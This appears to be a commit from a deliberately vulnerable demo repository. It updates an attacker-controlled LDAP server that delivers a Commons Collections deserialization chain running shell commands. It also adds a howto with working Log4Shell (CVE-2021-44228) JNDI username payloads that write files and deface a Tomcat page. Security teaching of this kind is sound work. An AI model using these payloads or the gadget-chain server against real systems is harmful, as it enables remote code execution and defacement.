updated the log4shell hacks with a howto

snyk-labs · Jan 10, 2022 · be674dd · be674dd
1 parent 186ff5c
commit be674dd
Show file tree

Hide file tree

Showing 4 changed files with 74 additions and 3 deletions.
diff --git a/log4shell-goof/log4shell-server/src/main/java/Server.java b/log4shell-goof/log4shell-server/src/main/java/Server.java
@@ -122,14 +122,23 @@ protected void sendResult(InMemoryInterceptedSearchResult result, String base, E
             throws LDAPException, MalformedURLException
         {
             System.out.println("Base = " + base);
-           if (base.equals("Commons")) {
+           if (base.equals("Commons") || base.equals("Commons2")) {
                 //deserialization attack chain in commons collections
                 System.out.println("Send LDAP reference result for " + base + " containing a deserialized chain");
 
                 String[] command = {
                         "/bin/sh",
                         "-c",
-                        "echo '<center><h1>Nice container you have, I think I will move in!</h1></center>' >> /usr/local/tomcat/webapps/todolist/WEB-INF/views/common/header.jspf"};
+                        "echo PWNED > /tmp/pwned-commons"};
+
+                if (base.equals("Commons2")) {
+                    String[] containerCommand = {
+                            "/bin/sh",
+                            "-c",
+                            "echo '<center><h1>This text is inserted using the Log4shell deserialization route with Commons Collection 3.1</h1></center>' >> /usr/local/tomcat/webapps/todolist/WEB-INF/views/common/header.jspf"};
+
+                    command = containerCommand;
+                }
 
                 final Transformer[] transformers = new Transformer[] {
                         new ConstantTransformer(Runtime.class),

diff --git a/todolist-goof/README.md b/todolist-goof/README.md
@@ -41,6 +41,10 @@ TODO
 
 - [Container base image exploit instructions](exploits/tomcat-rce/README.md)
 
+## Log4Shell exploits 
+
+- [Log4Shell exploits explained](exploits/log4shell/README.md)
+
 ## License
 This repo is available released under the [MIT License](http://opensource.org/licenses/mit-license.php/).
 # java-goof
diff --git a/todolist-goof/exploits/log4shell/README.md b/todolist-goof/exploits/log4shell/README.md
@@ -0,0 +1,59 @@
+# Log4Shell exploits in TODOlist application
+
+This application contains 2 exploits based on [CVE-2021-44228](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720)
+Both will can be accessed vai de login page.
+When a login is wrong or unknown the application will print log this using a vulnerable log4j version in the console exposing the user name.
+
+## Hack 1 for older Java builds `(trustURLCodebase=true`)
+
+These are the Java version where `com.sun.jndi.ldap.object.trustURLCodebase=true` by default.
+All JDK version up to 6u211, 7u201, 8u191, and 11.0.1 have this.
+Newer version can also be hacked with this method when manually setting `com.sun.jndi.ldap.object.trustURLCodebase=true`
+
+### Server
+Start up the log4shell server
+- go to `java-goof/log4shell-goof/log4shell-server`
+- Start up the server
+  - In the IDE (run /src/main/Server.java)
+  - Or use maven `mvn exec:java`
+
+### Hack
+After startup of the todolist application go to the login page and login with:
+- Username: `${jndi:ldap://127.0.0.1:9999/Evil}` (change the IP and port accordingly if not running on localhost)
+- Password: `does not matter`
+
+This results in a file written to `/tmp/pwned`
+
+### Explanation
+The server starts up 
+- jdni server
+- http wer server
+
+The log4j string evolves and connects to the LDAP (controlled by the hacker) the LDAP connect to the HTTP server (controlled by the hacker) and sends back a class file `Evil.classs`
+This class file contains the remote code execution (calling the runtime with an arbitrary command) in the `getObjectInstance()` method that is called when the object is created on the target machine.
+This only works when the JDK setting `com.sun.jndi.ldap.object.trustURLCodebase=true` which is the case with older JDK builds by default.
+
+## Hack 2 all Java build (including the newest builds)
+
+### Server
+- same as in Hack 1
+
+## Hack
+After startup of the todolist application go to the login page and login with:
+- Username: `${jndi:ldap://127.0.0.1:9999/Commons}` (change the IP and port accordingly if not running on localhost)
+- Password: `does not matter`
+
+This results in a file written to `/tmp/pwned-commons`
+
+Note: 
+When the using a Docker container with tomcat as described in tomcat-rce hack you can do the following
+- Username: `${jndi:ldap://host.docker.internal:9999/Commons2}` (change the IP and port accordingly if not running on localhost)
+- Password: `does not matter`
+
+This inserts some text to the header file 
+
+### Explanation
+For newer JDK builds, where `com.sun.jndi.ldap.object.trustURLCodebase=false` the hack method still works when the classes are already on the classpath.
+This mean we can preform an RCE using Java deserialization. 
+The applications has uses the `commons-collections 3.1` library that has known deserialization gadget chain embedded. 
+The LDAP server now returns a serialized version of this gadget chain. Since the classes are already available we can execute a command.
diff --git a/todolist-goof/todolist-web-struts/public/good.txt b/todolist-goof/todolist-web-struts/public/good.txt